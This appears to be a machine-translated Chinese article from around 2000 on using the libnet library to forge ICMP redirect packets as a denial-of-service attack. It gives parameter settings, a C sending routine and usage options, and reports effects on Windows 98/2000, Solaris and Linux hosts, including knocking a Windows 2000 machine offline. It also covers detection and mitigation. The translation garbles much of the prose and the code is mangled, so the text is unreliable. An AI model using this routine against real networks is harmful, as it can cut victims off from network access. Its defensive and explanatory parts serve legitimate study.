Example of LIBNET (6)
2000-01-01
SCZ
Technical documentation
Date: 2000-07-31 15:01
This article writes the libnet program to complete the ICMP redirection test, or first take a look at the relevant function:
INT libnet_build_icmp_redirect
U_CHAR TYPE, U_CHAR CODE, U_LONG GATEWAY, U_SHORT ORIG_LEN,
U_CHAR ORIG_TOS, U_SHORT ORIG_ID, U_SHORT Orig_Frag,
U_CHAR ORIG_TTL, U_CHAR ORIG_PROT, U_LONG ORIG_SRC,
u_long orig_dst, const u_char * orig_payload,
Int Orig_PayLoad_s, u_char * buf);
There is a macro definition in /usr/include/libnet/libnet-headers.h:
#define ICMP_Redirect 5
The first meticulum type TYPE can only set this value. The second ginseng can set up four values, for DOS attacks
Said, can only be set to ICMP_UNREACH_HOST (1), unfortunately, the name of the macro is not the horse mouth, this is
Whether the target host can reach there is no system, the actual meaning is only to do a specific host routing, and the network routing is redirected.
Has been discarded. Gateway specifies the specific host route IP to be used in the future, such as <>
192.168.8.90 mentioned in the 192.168.8.90, which will appear in the routing table of 192.168.10.60, very strange here
Little-endian order, and very useful BIG-Endian order, not excluding the possibility of programming omissions in implementation;
I386 / Linux, is the host word sequence, and pay attention to conversion when programming.
Orig_len is set to 0, and in fact, according to my experimental observation, this value is not
LIBNET_BUILD_ICMP_REDIRECT () uses, so I will set up this shape to 0; generated in ICMP
The IP header of the data area fixed 20 bytes, and the total length of the head is fixed to 20 bytes, which means that there is no load, this
The prototype is misleading. ORIG_TOS is set to 0, or the origin is set, or the orig_frag is set to 0.
Orig_ttl is set to 255, orig_prot is set to ipproto_ICMP (1), org_src with BIG-Endian
Set to "attack target" IP, such as 192.168.10.60 mentioned in <>,
Orig_dst set "Service Target" IP that is destroyed by BIG-Endian order, such as
<> 202.99.11.161 mentioned in the future, the specific host route generated is targeted
This IP is looking for. ORIG_PAYLOAD is set to null, oriG_payload_s is set to 0. Conversion BUF
Point to an allocated data area, the ICMP head starts from the pointer.
In fact, how to set up the parameters starting from Orig_len, I am considered from the simple perspective of programming.
As set above, you can fully understand these data, but you must clearly understand the meaning of the parameters you specify, it is best
Use NetXray to grab the message sent by your program and check the Decode section.
It involves two calculations for two checksums. LIBNET_DO_CHECKSUM () continues to calculate the ICMP packet checksum, this
It is necessary. Alternatively, the IP header checksum located in the ICMP data area, if not calculated, will
The checksum is "no checksum", although it is not wrong, it is equally effective, but it feels uncomfortable, anyway, I am calculated, the same is called:
LIBNET_DO_CHECKSUM (packet libnet_ip_h libnet_ICMP_Redirect_h,
Ipproto_ip, libnet_ip_h);
This function will set itself to the IP checksum of the ICMP data area.
As seen from the previous analysis, if you want to initiate an ICMP redirection attack on the WAN, at least you need to know the victim.
IP, prey to the current routing IP (follow the selection rules), subnet mask (easy to fake)
New routing IP). In general, the sacrifice IP does not need to say more, but the current routing IP is difficult later.
Getting, the subnet mask can generally consider Class C. and even smaller. How to get effective data, the benevolent see the benevolence
wisdom. Consider cooperating with the traceroute command.
Specify forged source IP (not randomized, must be current routing), attack target IP, service target IP
Start value (can be randomized), the number of service target IP, the forged routing IP (not randomized, must be directly routed),
ICMP redirect message number. There is no port concept intervention, no longer allows the specified target IP range, can only be specified
Single target IP, the result of the actual use angle.
How to detect, prevent ICMP redirection attacks? View the routing table is most direct. Netstat -s can also be perceived
Unable to work ICMP redirection attacks, because the redirect statistic has risen, this value is generally very small. Congregard
Analyze software, IDS, etc. It is easy to find out this attack attempt. Use firewall to limit ICMP redirection packets.
Modify the unit system, block the ICMP redirection message according to the specific situation.
For PWIN98, Yuan Ge provides a very simple way to modify VIP.386, search with UltraEdit
83 F9 11 77 08, modified to 83 f9 00 75 08, meaning if the received ICMP package is not
ICMP Echo reply jumps to the error handling. When I tested myself today, I forgot to modify it.
VIP.386, as well as issues issued by the program and failed to work.
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Void Irdsend (U_LONG SRCIP, U_LONG DSTIP, U_LONG SVRIP, U_LONG ROUTEIP, U_LONG IRDNUMBER)
{
U_long i;
/ * Construct IP head * /
LIBNET_BUILD_IP (libnet_icmp_redirect_h libnet_ip_h sczirddatalen, / * IP data area length * /
Iptos_lowdelay, / * ip TOS * /
(U_short) random (), / * ip id * /
0, / * frag stuff * /
255, / * ttl * /
Ipproto_icmp, / * Upper Protocol * /
SRCIP, / * BIG-endian order * /
Dstip, / * target ip * /
NULL, / * No option * /
0, / * Option length zero * /
Packet); / * Pointing IP head * /
/ * Construct ICMP redirection packet head * /
LIBNET_BUILD_ICMP_REDIRECT (ICMP_REDIRECT, / * TYPE * /
ICMP_UNREACH_HOST, / * CODE * /
// Here, Little-endian is used, it is very strange, it will not be an omission.
// For i386 / linux, it is the host word sequence ntohl (routeip), / * forged routing ip * /
0, / * This value is arbitrary * /
0, / * orig_tos * /
(U_short) random (), / * ip id * /
0, / * orig_frag * /
255, / * orig_ttl * /
Ipproto_ICMP, / * Upper Protocol Type * /
Dstip, / * Tour to understand this * /
SVRIP, / * is interfered with the target * /
Null, / * orig_payload * /
0, / * No option * /
Packet libnet_ip_h); / * Points to ICMP headers * /
// Calculate the IP header checksum located in the ICMP data area, if not calculated, in the future, the corresponding checksum is "no checks"
// Although it is not wrong, it is equally effective, but it feels uncomfortable. Anyway, I am calculated.
LIBNET_DO_CHECKSUM (packet libnet_ip_h libnet_ICMP_Redirect_h,
Ipproto_ip, libnet_ip_h);
/ / It must be aware that the calculation of ICMP redirect packet checks should occur after the entire ICMP packet is completed.
// Our destination, some data is completed in advance.
/ * Calculate ICMP redirection packet checksum, IP check, calculated by kernel * /
LIBNET_DO_CHECKSUM (Packet, Ipproto_ICMP,
LIBNET_ICMP_REDIRECT_H LIBNET_IP_H SczirdDatalen;
For (i = 0; i { / * Send ICMP redirection message * / Libnet_write_ip (Rawsocket, Packet, Packet_size); } / * End of for * / Return; } / * End of rtsend * / -------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------- Usage: ./ir [--si srcip] [--di dstip] [--SVR SVRIP] [--SVRNUM SVRNUMBER] [- ROUTEIP ROUTEIP] [--NUM IRDNUMBER] I have learned when I choose ROUTEIP. Since it is DOS, try not to choose those activities IP, if you can only choose to live Move IP also avoids the IP IP Forward capability, otherwise it is possible to trigger a legal ICMP redirector Row correction. If the victim is 98, use his own IP as Routeip, delete it, but affect the selection, occupying memory, and Route table search time. No frozening phenomenon has not been found, which can actually have the ability to access the Internet. After restarting, it will return to normal. For 2K, you can only set RouteIP into a non-active synonym IP, which cannot be set to itself, and has not yet been issued. It is now known that it can actually turn off its ability to access the Internet. Route -f add 0.0.0.0 mask 0.0.0.0 192.168.0.1 After returning to normal, the CPU usage is as high as 100% during the refresh. SPARC / Solaris 2.6 / 2.7 and i386 / linux basically are not affected by ICMP redirect packages. This The same is not correct, do the following experiment: Route Change Default 192.168.8.90 Ping -v 203.207.119.8 NetStat -NR --------------------------------------------- ------------- 203.207.119.8 192.168.0.1 UGHD 0 0 <- effective Default 192.168.8.90 UG 0 98 -------------------------------------------------- ------------ Route Delete Host 203.207.119.8 192.168.0.1 NDD / DEV / IP /? NDD -GET / DEV / IP IP_IGNORE_REDIRECT NDD -SET / DEV / IP IP_IGNORE_REDIRECT 1 Ping -v 203.207.119.8 Netstat -nr Contrast before and after. Solaris should do more stringent judgments, capture 98 routing features on 8.90 with NetXray Automatically send valid ICMP redirection packets, then immediately delete a specific host path that has just been added upwards on 10.7 From the NETXRAY to resend the redirect message is invalid. What is this judgment rule is not clear. For Linux, do the following experiments: Route del -Net 0.0.0.0 GW 192.168.0.1 Route Add -Net 0.0.0.0 GW 192.168.8.90 Ping -v 203.207.119.8 Netstat -nr Linux seems to be more cool than Solaris, simply not comply with RFC, and ignore ICMP redirection packets Note: